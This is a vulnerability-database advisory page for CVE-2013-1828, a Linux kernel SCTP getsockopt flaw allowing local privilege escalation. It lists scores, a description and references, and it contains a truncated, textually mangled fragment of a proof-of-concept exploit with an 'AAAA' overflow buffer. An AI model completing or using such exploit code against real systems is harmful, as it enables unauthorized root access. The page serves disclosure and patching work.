Published: 22/03/2013 Updated: 11/08/2023

CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4

VMScore: 695

Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

The sctp_getsockopt_assoc_stats function in net/sctp/socket.c in the Linux kernel prior to 3.8.4 does not validate a size value before proceeding to a copy_from_user operation, which allows local users to gain privileges via a crafted application that contains an SCTP_GET_ASSOC_STATS getsockopt system call.

Vulnerable Product	Search on Vulmon	Subscribe to Product
linux linux kernel

#include <stdioh> #include <stringh> #include <netinet/inh> #include <sys/socketh> #define SCTP_GET_ASSOC_STATS 112 #define SOL_SCTP 132 int main(void) { char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...

CWE-20 http://twitter.com/grsecurity/statuses/309805924749541376 https://bugzilla.redhat.com/show_bug.cgi?id=919315 http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.8.4 http://grsecurity.net/~spender/sctp.c http://www.openwall.com/lists/oss-security/2013/03/08/2 https://github.com/torvalds/linux/commit/726bc6b092da4c093eb74d13c07184b18c1af0f1 http://www.exploit-db.com/exploits/24747 http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=726bc6b092da4c093eb74d13c07184b18c1af0f1 https://nvd.nist.gov https://www.exploit-db.com/exploits/24747/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2013-1828

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect